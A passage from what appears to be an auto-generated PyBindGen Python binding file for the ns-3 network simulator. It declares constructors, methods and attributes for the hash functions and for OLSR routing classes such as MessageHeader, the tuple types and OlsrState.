ns3::Hash::Function::Fnv1a::GetHash64(char const * buffer, size_t const size) [member function] cls.add_method('GetHash64', 'uint64_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_virtual=True) ## hash-fnv.h (module 'core'): void ns3::Hash::Function::Fnv1a::clear() [member function] cls.add_method('clear', 'void', [], is_virtual=True) return def register_Ns3HashFunctionHash32_methods(root_module, cls): ## hash-function.h (module 'core'): ns3::Hash::Function::Hash32::Hash32(ns3::Hash::Function::Hash32 const & arg0) [copy constructor] cls.add_constructor([param('ns3::Hash::Function::Hash32 const &', 'arg0')]) ## hash-function.h (module 'core'): ns3::Hash::Function::Hash32::Hash32(ns3::Hash::Hash32Function_ptr hp) [constructor] cls.add_constructor([param('ns3::Hash::Hash32Function_ptr', 'hp')]) ## hash-function.h (module 'core'): uint32_t ns3::Hash::Function::Hash32::GetHash32(char const * buffer, size_t const size) [member function] cls.add_method('GetHash32', 'uint32_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_virtual=True) ## hash-function.h (module 'core'): void ns3::Hash::Function::Hash32::clear() [member function] cls.add_method('clear', 'void', [], is_virtual=True) return def register_Ns3HashFunctionHash64_methods(root_module, cls): ## hash-function.h (module 'core'): ns3::Hash::Function::Hash64::Hash64(ns3::Hash::Function::Hash64 const & arg0) [copy constructor] cls.add_constructor([param('ns3::Hash::Function::Hash64 const &', 'arg0')]) ## hash-function.h (module 'core'): ns3::Hash::Function::Hash64::Hash64(ns3::Hash::Hash64Function_ptr hp) [constructor] cls.add_constructor([param('ns3::Hash::Hash64Function_ptr', 'hp')]) ## hash-function.h (module 'core'): uint32_t ns3::Hash::Function::Hash64::GetHash32(char const * buffer, size_t const size) [member function] cls.add_method('GetHash32', 'uint32_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_virtual=True) ## hash-function.h (module 
'core'): uint64_t ns3::Hash::Function::Hash64::GetHash64(char const * buffer, size_t const size) [member function] cls.add_method('GetHash64', 'uint64_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_virtual=True) ## hash-function.h (module 'core'): void ns3::Hash::Function::Hash64::clear() [member function] cls.add_method('clear', 'void', [], is_virtual=True) return def register_Ns3HashFunctionMurmur3_methods(root_module, cls): ## hash-murmur3.h (module 'core'): ns3::Hash::Function::Murmur3::Murmur3(ns3::Hash::Function::Murmur3 const & arg0) [copy constructor] cls.add_constructor([param('ns3::Hash::Function::Murmur3 const &', 'arg0')]) ## hash-murmur3.h (module 'core'): ns3::Hash::Function::Murmur3::Murmur3() [constructor] cls.add_constructor([]) ## hash-murmur3.h (module 'core'): uint32_t ns3::Hash::Function::Murmur3::GetHash32(char const * buffer, size_t const size) [member function] cls.add_method('GetHash32', 'uint32_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_virtual=True) ## hash-murmur3.h (module 'core'): uint64_t ns3::Hash::Function::Murmur3::GetHash64(char const * buffer, size_t const size) [member function] cls.add_method('GetHash64', 'uint64_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_virtual=True) ## hash-murmur3.h (module 'core'): void ns3::Hash::Function::Murmur3::clear() [member function] cls.add_method('clear', 'void', [], is_virtual=True) return def register_Ns3OlsrAssociation_methods(root_module, cls): cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## olsr-repositories.h (module 'olsr'): ns3::olsr::Association::Association() [constructor] cls.add_constructor([]) ## olsr-repositories.h (module 'olsr'): ns3::olsr::Association::Association(ns3::olsr::Association const & arg0) [copy constructor] cls.add_constructor([param('ns3::olsr::Association const &', 'arg0')]) ## olsr-repositories.h (module 'olsr'): ns3::olsr::Association::netmask 
[variable] cls.add_instance_attribute('netmask', 'ns3::Ipv4Mask', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::Association::networkAddr [variable] cls.add_instance_attribute('networkAddr', 'ns3::Ipv4Address', is_const=False) return def register_Ns3OlsrAssociationTuple_methods(root_module, cls): cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## olsr-repositories.h (module 'olsr'): ns3::olsr::AssociationTuple::AssociationTuple() [constructor] cls.add_constructor([]) ## olsr-repositories.h (module 'olsr'): ns3::olsr::AssociationTuple::AssociationTuple(ns3::olsr::AssociationTuple const & arg0) [copy constructor] cls.add_constructor([param('ns3::olsr::AssociationTuple const &', 'arg0')]) ## olsr-repositories.h (module 'olsr'): ns3::olsr::AssociationTuple::expirationTime [variable] cls.add_instance_attribute('expirationTime', 'ns3::Time', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::AssociationTuple::gatewayAddr [variable] cls.add_instance_attribute('gatewayAddr', 'ns3::Ipv4Address', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::AssociationTuple::netmask [variable] cls.add_instance_attribute('netmask', 'ns3::Ipv4Mask', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::AssociationTuple::networkAddr [variable] cls.add_instance_attribute('networkAddr', 'ns3::Ipv4Address', is_const=False) return def register_Ns3OlsrDuplicateTuple_methods(root_module, cls): cls.add_binary_comparison_operator('==') ## olsr-repositories.h (module 'olsr'): ns3::olsr::DuplicateTuple::DuplicateTuple() [constructor] cls.add_constructor([]) ## olsr-repositories.h (module 'olsr'): ns3::olsr::DuplicateTuple::DuplicateTuple(ns3::olsr::DuplicateTuple const & arg0) [copy constructor] cls.add_constructor([param('ns3::olsr::DuplicateTuple const &', 'arg0')]) ## olsr-repositories.h (module 'olsr'): ns3::olsr::DuplicateTuple::address [variable] cls.add_instance_attribute('address', 'ns3::Ipv4Address', 
is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::DuplicateTuple::expirationTime [variable] cls.add_instance_attribute('expirationTime', 'ns3::Time', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::DuplicateTuple::ifaceList [variable] cls.add_instance_attribute('ifaceList', 'std::vector< ns3::Ipv4Address >', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::DuplicateTuple::retransmitted [variable] cls.add_instance_attribute('retransmitted', 'bool', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::DuplicateTuple::sequenceNumber [variable] cls.add_instance_attribute('sequenceNumber', 'uint16_t', is_const=False) return def register_Ns3OlsrIfaceAssocTuple_methods(root_module, cls): cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## olsr-repositories.h (module 'olsr'): ns3::olsr::IfaceAssocTuple::IfaceAssocTuple() [constructor] cls.add_constructor([]) ## olsr-repositories.h (module 'olsr'): ns3::olsr::IfaceAssocTuple::IfaceAssocTuple(ns3::olsr::IfaceAssocTuple const & arg0) [copy constructor] cls.add_constructor([param('ns3::olsr::IfaceAssocTuple const &', 'arg0')]) ## olsr-repositories.h (module 'olsr'): ns3::olsr::IfaceAssocTuple::ifaceAddr [variable] cls.add_instance_attribute('ifaceAddr', 'ns3::Ipv4Address', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::IfaceAssocTuple::mainAddr [variable] cls.add_instance_attribute('mainAddr', 'ns3::Ipv4Address', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::IfaceAssocTuple::time [variable] cls.add_instance_attribute('time', 'ns3::Time', is_const=False) return def register_Ns3OlsrLinkTuple_methods(root_module, cls): cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## olsr-repositories.h (module 'olsr'): ns3::olsr::LinkTuple::LinkTuple() [constructor] cls.add_constructor([]) ## olsr-repositories.h (module 'olsr'): ns3::olsr::LinkTuple::LinkTuple(ns3::olsr::LinkTuple const 
& arg0) [copy constructor] cls.add_constructor([param('ns3::olsr::LinkTuple const &', 'arg0')]) ## olsr-repositories.h (module 'olsr'): ns3::olsr::LinkTuple::asymTime [variable] cls.add_instance_attribute('asymTime', 'ns3::Time', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::LinkTuple::localIfaceAddr [variable] cls.add_instance_attribute('localIfaceAddr', 'ns3::Ipv4Address', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::LinkTuple::neighborIfaceAddr [variable] cls.add_instance_attribute('neighborIfaceAddr', 'ns3::Ipv4Address', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::LinkTuple::symTime [variable] cls.add_instance_attribute('symTime', 'ns3::Time', is_const=False) ## olsr-repositories.h (module 'olsr'): ns3::olsr::LinkTuple::time [variable] cls.add_instance_attribute('time', 'ns3::Time', is_const=False) return def register_Ns3OlsrMessageHeader_methods(root_module, cls): cls.add_output_stream_operator() ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::MessageHeader(ns3::olsr::MessageHeader const & arg0) [copy constructor] cls.add_constructor([param('ns3::olsr::MessageHeader const &', 'arg0')]) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::MessageHeader() [constructor] cls.add_constructor([]) ## olsr-header.h (module 'olsr'): uint32_t ns3::olsr::MessageHeader::Deserialize(ns3::Buffer::Iterator start) [member function] cls.add_method('Deserialize', 'uint32_t', [param('ns3::Buffer::Iterator', 'start')], is_virtual=True) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hello & ns3::olsr::MessageHeader::GetHello() [member function] cls.add_method('GetHello', 'ns3::olsr::MessageHeader::Hello &', []) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hello const & ns3::olsr::MessageHeader::GetHello() const [member function] cls.add_method('GetHello', 'ns3::olsr::MessageHeader::Hello const &', [], is_const=True) ## olsr-header.h (module 'olsr'): 
ns3::olsr::MessageHeader::Hna & ns3::olsr::MessageHeader::GetHna() [member function] cls.add_method('GetHna', 'ns3::olsr::MessageHeader::Hna &', []) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hna const & ns3::olsr::MessageHeader::GetHna() const [member function] cls.add_method('GetHna', 'ns3::olsr::MessageHeader::Hna const &', [], is_const=True) ## olsr-header.h (module 'olsr'): uint8_t ns3::olsr::MessageHeader::GetHopCount() const [member function] cls.add_method('GetHopCount', 'uint8_t', [], is_const=True) ## olsr-header.h (module 'olsr'): ns3::TypeId ns3::olsr::MessageHeader::GetInstanceTypeId() const [member function] cls.add_method('GetInstanceTypeId', 'ns3::TypeId', [], is_const=True, is_virtual=True) ## olsr-header.h (module 'olsr'): uint16_t ns3::olsr::MessageHeader::GetMessageSequenceNumber() const [member function] cls.add_method('GetMessageSequenceNumber', 'uint16_t', [], is_const=True) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::MessageType ns3::olsr::MessageHeader::GetMessageType() const [member function] cls.add_method('GetMessageType', 'ns3::olsr::MessageHeader::MessageType', [], is_const=True) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Mid & ns3::olsr::MessageHeader::GetMid() [member function] cls.add_method('GetMid', 'ns3::olsr::MessageHeader::Mid &', []) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Mid const & ns3::olsr::MessageHeader::GetMid() const [member function] cls.add_method('GetMid', 'ns3::olsr::MessageHeader::Mid const &', [], is_const=True) ## olsr-header.h (module 'olsr'): ns3::Ipv4Address ns3::olsr::MessageHeader::GetOriginatorAddress() const [member function] cls.add_method('GetOriginatorAddress', 'ns3::Ipv4Address', [], is_const=True) ## olsr-header.h (module 'olsr'): uint32_t ns3::olsr::MessageHeader::GetSerializedSize() const [member function] cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True, is_virtual=True) ## olsr-header.h (module 'olsr'): 
ns3::olsr::MessageHeader::Tc & ns3::olsr::MessageHeader::GetTc() [member function] cls.add_method('GetTc', 'ns3::olsr::MessageHeader::Tc &', []) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Tc const & ns3::olsr::MessageHeader::GetTc() const [member function] cls.add_method('GetTc', 'ns3::olsr::MessageHeader::Tc const &', [], is_const=True) ## olsr-header.h (module 'olsr'): uint8_t ns3::olsr::MessageHeader::GetTimeToLive() const [member function] cls.add_method('GetTimeToLive', 'uint8_t', [], is_const=True) ## olsr-header.h (module 'olsr'): static ns3::TypeId ns3::olsr::MessageHeader::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## olsr-header.h (module 'olsr'): ns3::Time ns3::olsr::MessageHeader::GetVTime() const [member function] cls.add_method('GetVTime', 'ns3::Time', [], is_const=True) ## olsr-header.h (module 'olsr'): void ns3::olsr::MessageHeader::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True, is_virtual=True) ## olsr-header.h (module 'olsr'): void ns3::olsr::MessageHeader::Serialize(ns3::Buffer::Iterator start) const [member function] cls.add_method('Serialize', 'void', [param('ns3::Buffer::Iterator', 'start')], is_const=True, is_virtual=True) ## olsr-header.h (module 'olsr'): void ns3::olsr::MessageHeader::SetHopCount(uint8_t hopCount) [member function] cls.add_method('SetHopCount', 'void', [param('uint8_t', 'hopCount')]) ## olsr-header.h (module 'olsr'): void ns3::olsr::MessageHeader::SetMessageSequenceNumber(uint16_t messageSequenceNumber) [member function] cls.add_method('SetMessageSequenceNumber', 'void', [param('uint16_t', 'messageSequenceNumber')]) ## olsr-header.h (module 'olsr'): void ns3::olsr::MessageHeader::SetMessageType(ns3::olsr::MessageHeader::MessageType messageType) [member function] cls.add_method('SetMessageType', 'void', [param('ns3::olsr::MessageHeader::MessageType', 'messageType')]) ## 
olsr-header.h (module 'olsr'): void ns3::olsr::MessageHeader::SetOriginatorAddress(ns3::Ipv4Address originatorAddress) [member function] cls.add_method('SetOriginatorAddress', 'void', [param('ns3::Ipv4Address', 'originatorAddress')]) ## olsr-header.h (module 'olsr'): void ns3::olsr::MessageHeader::SetTimeToLive(uint8_t timeToLive) [member function] cls.add_method('SetTimeToLive', 'void', [param('uint8_t', 'timeToLive')]) ## olsr-header.h (module 'olsr'): void ns3::olsr::MessageHeader::SetVTime(ns3::Time time) [member function] cls.add_method('SetVTime', 'void', [param('ns3::Time', 'time')]) return def register_Ns3OlsrMessageHeaderHello_methods(root_module, cls): ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hello::Hello() [constructor] cls.add_constructor([]) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hello::Hello(ns3::olsr::MessageHeader::Hello const & arg0) [copy constructor] cls.add_constructor([param('ns3::olsr::MessageHeader::Hello const &', 'arg0')]) ## olsr-header.h (module 'olsr'): uint32_t ns3::olsr::MessageHeader::Hello::Deserialize(ns3::Buffer::Iterator start, uint32_t messageSize) [member function] cls.add_method('Deserialize', 'uint32_t', [param('ns3::Buffer::Iterator', 'start'), param('uint32_t', 'messageSize')]) ## olsr-header.h (module 'olsr'): ns3::Time ns3::olsr::MessageHeader::Hello::GetHTime() const [member function] cls.add_method('GetHTime', 'ns3::Time', [], is_const=True) ## olsr-header.h (module 'olsr'): uint32_t ns3::olsr::MessageHeader::Hello::GetSerializedSize() const [member function] cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True) ## olsr-header.h (module 'olsr'): void ns3::olsr::MessageHeader::Hello::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True) ## olsr-header.h (module 'olsr'): void ns3::olsr::MessageHeader::Hello::Serialize(ns3::Buffer::Iterator start) const [member function] cls.add_method('Serialize', 
                   'void', [param('ns3::Buffer::Iterator', 'start')], is_const=True)
    ## olsr-header.h (module 'olsr'): void ns3::olsr::MessageHeader::Hello::SetHTime(ns3::Time time) [member function]
    cls.add_method('SetHTime', 'void', [param('ns3::Time', 'time')])
    ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hello::hTime [variable]
    cls.add_instance_attribute('hTime', 'uint8_t', is_const=False)
    ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hello::linkMessages [variable]
    cls.add_instance_attribute('linkMessages', 'std::vector< ns3::olsr::MessageHeader::Hello::LinkMessage >', is_const=False)
    ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hello::willingness [variable]
    cls.add_instance_attribute('willingness', 'uint8_t', is_const=False)
    return

# NOTE(review): the register_* functions below look like PyBindGen
# auto-generated binding registrations for the ns-3 'olsr' module.  Each one
# receives the module root and a pybindgen class wrapper ('cls') and declares
# the C++ constructors, methods and public attributes to expose to Python.
# Prefer regenerating the bindings over hand-editing these declarations.

def register_Ns3OlsrMessageHeaderHelloLinkMessage_methods(root_module, cls):
    # Bindings for ns3::olsr::MessageHeader::Hello::LinkMessage: constructors
    # plus its public data members (a plain struct in the C++ API).
    ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hello::LinkMessage::LinkMessage() [constructor]
    cls.add_constructor([])
    ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hello::LinkMessage::LinkMessage(ns3::olsr::MessageHeader::Hello::LinkMessage const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::olsr::MessageHeader::Hello::LinkMessage const &', 'arg0')])
    ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hello::LinkMessage::linkCode [variable]
    cls.add_instance_attribute('linkCode', 'uint8_t', is_const=False)
    ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hello::LinkMessage::neighborInterfaceAddresses [variable]
    cls.add_instance_attribute('neighborInterfaceAddresses', 'std::vector< ns3::Ipv4Address >', is_const=False)
    return

def register_Ns3OlsrMessageHeaderHna_methods(root_module, cls):
    # Bindings for ns3::olsr::MessageHeader::Hna: constructors, the
    # serialize/deserialize/print interface, and the associations vector.
    ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hna::Hna() [constructor]
    cls.add_constructor([])
    ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hna::Hna(ns3::olsr::MessageHeader::Hna const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::olsr::MessageHeader::Hna const &', 'arg0')])
    ## olsr-header.h (module 'olsr'): uint32_t ns3::olsr::MessageHeader::Hna::Deserialize(ns3::Buffer::Iterator start, uint32_t messageSize) [member function]
    cls.add_method('Deserialize', 'uint32_t', [param('ns3::Buffer::Iterator', 'start'), param('uint32_t', 'messageSize')])
    ## olsr-header.h (module 'olsr'): uint32_t ns3::olsr::MessageHeader::Hna::GetSerializedSize() const [member function]
    cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True)
    ## olsr-header.h (module 'olsr'): void ns3::olsr::MessageHeader::Hna::Print(std::ostream & os) const [member function]
    cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True)
    ## olsr-header.h (module 'olsr'): void ns3::olsr::MessageHeader::Hna::Serialize(ns3::Buffer::Iterator start) const [member function]
    cls.add_method('Serialize', 'void', [param('ns3::Buffer::Iterator', 'start')], is_const=True)
    ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hna::associations [variable]
    cls.add_instance_attribute('associations', 'std::vector< ns3::olsr::MessageHeader::Hna::Association >', is_const=False)
    return

def register_Ns3OlsrMessageHeaderHnaAssociation_methods(root_module, cls):
    # Bindings for ns3::olsr::MessageHeader::Hna::Association: constructors
    # plus the (address, mask) pair it carries.
    ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hna::Association::Association() [constructor]
    cls.add_constructor([])
    ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hna::Association::Association(ns3::olsr::MessageHeader::Hna::Association const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::olsr::MessageHeader::Hna::Association const &', 'arg0')])
    ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hna::Association::address [variable]
    cls.add_instance_attribute('address', 'ns3::Ipv4Address', is_const=False)
    ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hna::Association::mask [variable]
    cls.add_instance_attribute('mask', 'ns3::Ipv4Mask', is_const=False)
    return

def register_Ns3OlsrMessageHeaderMid_methods(root_module, cls):
    # Bindings for ns3::olsr::MessageHeader::Mid: constructors, the
    # serialize/deserialize/print interface, and the interface address list.
    ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Mid::Mid() [constructor]
    cls.add_constructor([])
    ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Mid::Mid(ns3::olsr::MessageHeader::Mid const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::olsr::MessageHeader::Mid const &', 'arg0')])
    ## olsr-header.h (module 'olsr'): uint32_t ns3::olsr::MessageHeader::Mid::Deserialize(ns3::Buffer::Iterator start, uint32_t messageSize) [member function]
    cls.add_method('Deserialize', 'uint32_t', [param('ns3::Buffer::Iterator', 'start'), param('uint32_t', 'messageSize')])
    ## olsr-header.h (module 'olsr'): uint32_t ns3::olsr::MessageHeader::Mid::GetSerializedSize() const [member function]
    cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True)
    ## olsr-header.h (module 'olsr'): void ns3::olsr::MessageHeader::Mid::Print(std::ostream & os) const [member function]
    cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True)
    ## olsr-header.h (module 'olsr'): void ns3::olsr::MessageHeader::Mid::Serialize(ns3::Buffer::Iterator start) const [member function]
    cls.add_method('Serialize', 'void', [param('ns3::Buffer::Iterator', 'start')], is_const=True)
    ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Mid::interfaceAddresses [variable]
    cls.add_instance_attribute('interfaceAddresses', 'std::vector< ns3::Ipv4Address >', is_const=False)
    return

def register_Ns3OlsrMessageHeaderTc_methods(root_module, cls):
    # Bindings for ns3::olsr::MessageHeader::Tc: constructors, the
    # serialize/deserialize/print interface, ANSN and neighbor addresses.
    ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Tc::Tc() [constructor]
    cls.add_constructor([])
    ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Tc::Tc(ns3::olsr::MessageHeader::Tc const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::olsr::MessageHeader::Tc const &', 'arg0')])
    ## olsr-header.h (module 'olsr'): uint32_t ns3::olsr::MessageHeader::Tc::Deserialize(ns3::Buffer::Iterator start, uint32_t messageSize) [member function]
    cls.add_method('Deserialize', 'uint32_t', [param('ns3::Buffer::Iterator', 'start'), param('uint32_t', 'messageSize')])
    ## olsr-header.h (module 'olsr'): uint32_t ns3::olsr::MessageHeader::Tc::GetSerializedSize() const [member function]
    cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True)
    ## olsr-header.h (module 'olsr'): void ns3::olsr::MessageHeader::Tc::Print(std::ostream & os) const [member function]
    cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True)
    ## olsr-header.h (module 'olsr'): void ns3::olsr::MessageHeader::Tc::Serialize(ns3::Buffer::Iterator start) const [member function]
    cls.add_method('Serialize', 'void', [param('ns3::Buffer::Iterator', 'start')], is_const=True)
    ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Tc::ansn [variable]
    cls.add_instance_attribute('ansn', 'uint16_t', is_const=False)
    ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Tc::neighborAddresses [variable]
    cls.add_instance_attribute('neighborAddresses', 'std::vector< ns3::Ipv4Address >', is_const=False)
    return

def register_Ns3OlsrMprSelectorTuple_methods(root_module, cls):
    # Bindings for ns3::olsr::MprSelectorTuple: equality operator,
    # constructors and public fields.
    cls.add_binary_comparison_operator('==')
    ## olsr-repositories.h (module 'olsr'): ns3::olsr::MprSelectorTuple::MprSelectorTuple() [constructor]
    cls.add_constructor([])
    ## olsr-repositories.h (module 'olsr'): ns3::olsr::MprSelectorTuple::MprSelectorTuple(ns3::olsr::MprSelectorTuple const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::olsr::MprSelectorTuple const &', 'arg0')])
    ## olsr-repositories.h (module 'olsr'): ns3::olsr::MprSelectorTuple::expirationTime [variable]
    cls.add_instance_attribute('expirationTime', 'ns3::Time', is_const=False)
    ## olsr-repositories.h (module 'olsr'): ns3::olsr::MprSelectorTuple::mainAddr [variable]
    cls.add_instance_attribute('mainAddr', 'ns3::Ipv4Address', is_const=False)
    return

def register_Ns3OlsrNeighborTuple_methods(root_module, cls):
    # Bindings for ns3::olsr::NeighborTuple: stream/equality operators,
    # constructors and public fields.
    cls.add_output_stream_operator()
    cls.add_binary_comparison_operator('==')
    ## olsr-repositories.h (module 'olsr'): ns3::olsr::NeighborTuple::NeighborTuple() [constructor]
    cls.add_constructor([])
    ## olsr-repositories.h (module 'olsr'): ns3::olsr::NeighborTuple::NeighborTuple(ns3::olsr::NeighborTuple const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::olsr::NeighborTuple const &', 'arg0')])
    ## olsr-repositories.h (module 'olsr'): ns3::olsr::NeighborTuple::neighborMainAddr [variable]
    cls.add_instance_attribute('neighborMainAddr', 'ns3::Ipv4Address', is_const=False)
    ## olsr-repositories.h (module 'olsr'): ns3::olsr::NeighborTuple::status [variable]
    cls.add_instance_attribute('status', 'ns3::olsr::NeighborTuple::Status', is_const=False)
    ## olsr-repositories.h (module 'olsr'): ns3::olsr::NeighborTuple::willingness [variable]
    cls.add_instance_attribute('willingness', 'uint8_t', is_const=False)
    return

def register_Ns3OlsrOlsrState_methods(root_module, cls):
    # Bindings for ns3::olsr::OlsrState, the protocol's repository of link,
    # neighbor, two-hop-neighbor, MPR, topology and association tuples.
    # Declarations are grouped as in the header: constructors, then the
    # Erase*/Find*/Get*/Insert* accessors.
    ## olsr-state.h (module 'olsr'): ns3::olsr::OlsrState::OlsrState(ns3::olsr::OlsrState const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::olsr::OlsrState const &', 'arg0')])
    ## olsr-state.h (module 'olsr'): ns3::olsr::OlsrState::OlsrState() [constructor]
    cls.add_constructor([])
    ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::EraseAssociation(ns3::olsr::Association const & tuple) [member function]
    cls.add_method('EraseAssociation', 'void', [param('ns3::olsr::Association const &', 'tuple')])
    ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::EraseAssociationTuple(ns3::olsr::AssociationTuple const & tuple) [member function]
    cls.add_method('EraseAssociationTuple', 'void', [param('ns3::olsr::AssociationTuple const &', 'tuple')])
    ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::EraseDuplicateTuple(ns3::olsr::DuplicateTuple const & tuple) [member function]
    cls.add_method('EraseDuplicateTuple', 'void', [param('ns3::olsr::DuplicateTuple const &', 'tuple')])
    ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::EraseIfaceAssocTuple(ns3::olsr::IfaceAssocTuple const & tuple) [member function]
    cls.add_method('EraseIfaceAssocTuple', 'void', [param('ns3::olsr::IfaceAssocTuple const &', 'tuple')])
    ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::EraseLinkTuple(ns3::olsr::LinkTuple const & tuple) [member function]
    cls.add_method('EraseLinkTuple', 'void', [param('ns3::olsr::LinkTuple const &', 'tuple')])
    ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::EraseMprSelectorTuple(ns3::olsr::MprSelectorTuple const & tuple) [member function]
    cls.add_method('EraseMprSelectorTuple', 'void', [param('ns3::olsr::MprSelectorTuple const &', 'tuple')])
    ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::EraseMprSelectorTuples(ns3::Ipv4Address const & mainAddr) [member function]
    cls.add_method('EraseMprSelectorTuples', 'void', [param('ns3::Ipv4Address const &', 'mainAddr')])
    ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::EraseNeighborTuple(ns3::olsr::NeighborTuple const & neighborTuple) [member function]
    cls.add_method('EraseNeighborTuple', 'void', [param('ns3::olsr::NeighborTuple const &', 'neighborTuple')])
    ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::EraseNeighborTuple(ns3::Ipv4Address const & mainAddr) [member function]
    cls.add_method('EraseNeighborTuple', 'void', [param('ns3::Ipv4Address const &', 'mainAddr')])
    ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::EraseOlderTopologyTuples(ns3::Ipv4Address const & lastAddr, uint16_t ansn) [member function]
    cls.add_method('EraseOlderTopologyTuples', 'void', [param('ns3::Ipv4Address const &', 'lastAddr'), param('uint16_t', 'ansn')])
    ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::EraseTopologyTuple(ns3::olsr::TopologyTuple const & tuple) [member function]
    cls.add_method('EraseTopologyTuple', 'void', [param('ns3::olsr::TopologyTuple const &', 'tuple')])
    ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::EraseTwoHopNeighborTuple(ns3::olsr::TwoHopNeighborTuple const & tuple) [member function]
    cls.add_method('EraseTwoHopNeighborTuple', 'void', [param('ns3::olsr::TwoHopNeighborTuple const &', 'tuple')])
    ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::EraseTwoHopNeighborTuples(ns3::Ipv4Address const & neighbor) [member function]
    cls.add_method('EraseTwoHopNeighborTuples', 'void', [param('ns3::Ipv4Address const &', 'neighbor')])
    ## olsr-state.h (module 'olsr'): void ns3::olsr::OlsrState::EraseTwoHopNeighborTuples(ns3::Ipv4Address const & neighbor, ns3::Ipv4Address const & twoHopNeighbor) [member function]
    cls.add_method('EraseTwoHopNeighborTuples', 'void', [param('ns3::Ipv4Address const &', 'neighbor'), param('ns3::Ipv4Address const &', 'twoHopNeighbor')])
    ## olsr-state.h (module 'olsr'): ns3::olsr::AssociationTuple * ns3::olsr::OlsrState::FindAssociationTuple(ns3::Ipv4Address const & gatewayAddr, ns3::Ipv4Address const & networkAddr, ns3::Ipv4Mask const & netmask) [member function]
